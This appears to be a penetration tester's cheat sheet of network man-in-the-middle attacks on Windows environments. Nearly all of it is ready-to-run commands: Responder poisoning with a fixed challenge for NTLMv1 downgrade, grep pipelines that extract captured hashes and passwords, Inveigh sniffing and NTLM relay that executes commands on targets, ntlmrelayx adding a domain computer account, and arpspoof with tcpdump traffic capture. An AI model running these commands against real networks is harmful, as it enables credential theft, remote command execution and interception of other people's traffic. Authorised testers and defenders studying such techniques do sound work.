MITM

Responder

Set challenge to 1122334455667788 in /etc/responder/Responder.conf

Passive mode

responder -I <interface> -A

Active mode

responder -I <interface> -wrf

Aggressive mode

responder -I eth0 -wrf -F -P --lm >> responder.txt
grep -a "NTLMv1 Hash" responder.txt | awk -F ": " '{print $2}'
grep -a "NTLMv" responder.txt | grep Hash
grep -a "NTLMv1 Hash" responder.txt | awk -F ": " '{print $2}' | awk -F ":" '{print $1 "::::" $5 ":" $6}'

Hardcore mode

responder -I eth0 -wrfb -F -P --lm >> responder.txt
grep -a -i password responder.txt -B3

NTLM

NTLM MITM attacks

Sniffer

Invoke-Inveigh -ConsoleOutput Y
Invoke-Inveigh -ConsoleOutput N -RunTime 15 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y
Stop-Inveigh

Packet can be captured in order to extract the hashes

netsh trace start scenario=NetConnection capture=yes persistent=no maxSize=100MB traceFile=C:\NetTrace2.etl

NTLMv1 downgrade attack https://crack.sh

misc::easyntlmchall
NTLM Relay

SMB signing has to be disable for this kind of attack.

Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target <ip> -Command "<cmd>" -Attack Enumerate,Execute,Session
cme smb <CIDR> --gen-relay-list smbrelay.txt
ntlmrelayx.py -tf smbrelay.txt

Add computer start BH (not tested)

ntlmrelayx.py -t ldaps://<dc_fqdn> --add-computer
python bloodhound.py -d <domain> -u <computer>\$ -p '<password>'

Relay and delegation - https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/

ARP Spoofing

Without Gateway

sysctl -w net.ipv4.ip_forward=1
arpspoof -i eth0 <target>
tcpdump -i eth0 -S 65535 -w out.pcap -vv

With Gateway

sysctl -w net.ipv4.ip_forward=1
arpspoof -t <target> <gateway>
tcpdump -i eth0 -S 65535 -w out.pcap -vv